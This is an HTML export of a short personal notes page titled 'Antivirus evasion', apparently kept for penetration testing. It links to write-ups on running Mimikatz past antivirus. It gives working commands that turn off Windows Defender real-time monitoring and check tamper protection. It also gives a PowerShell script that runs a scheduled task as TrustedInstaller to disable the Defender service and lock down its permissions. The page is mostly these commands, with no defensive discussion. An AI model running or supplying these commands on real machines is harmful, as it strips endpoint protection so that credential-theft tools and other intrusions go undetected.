<html>
  
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="stylesheet" href="../../style.css">
    <base target="_parent">
    <title data-trilium-title>Antivirus evasion</title>
  </head>
  
  <body>
    <div class="content">
       <h1 data-trilium-h1>Antivirus evasion</h1>

      <div class="ck-content">
        <p><a href="https://www.blackhillsinfosec.com/bypass-anti-virus-run-mimikatz/">https://www.blackhillsinfosec.com/bypass-anti-virus-run-mimikatz/</a> </p>
        <p>To disable defender, use:</p><pre><code class="language-text-plain">Set-MpPreference -DisableRealtimeMonitoring $true</code></pre>

        <p>We could probably quit here and get a lot of mileage out of this script,
          but as my daughter would say after reading the disclaimer on hand sanitizer,
          “Why don’t they just put a little bit more in and kill ‘em all!?” </p><pre><code class="language-text-plain">reg query "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v TamperProtection</code></pre>

        <p>This repo shows us a way around:
          <br /><a href="https://gist.github.com/tyranid/c65520160b61ec851e68811de3cd646d">https://gist.github.com/tyranid/c65520160b61ec851e68811de3cd646d</a> </p><pre><code class="language-text-plain">$cmdline = '/C sc.exe config windefend start= disabled &amp;&amp; sc.exe sdset windefend D:(D;;GA;;;WD)(D;;GA;;;OW)'

$a = New-ScheduledTaskAction -Execute "cmd.exe" -Argument $cmdline
Register-ScheduledTask -TaskName 'TestTask' -Action $a

$svc = New-Object -ComObject 'Schedule.Service'
$svc.Connect()

$user = 'NT SERVICE\TrustedInstaller'
$folder = $svc.GetFolder('\')
$task = $folder.GetTask('TestTask')
$task.RunEx($null, 0, 0, $user)</code></pre>

        <p> </p>
        <figure class="image">
          <img src="Antivirus%20evasion/image.jpg" />
        </figure>
      </div>
    </div>
  </body>

</html>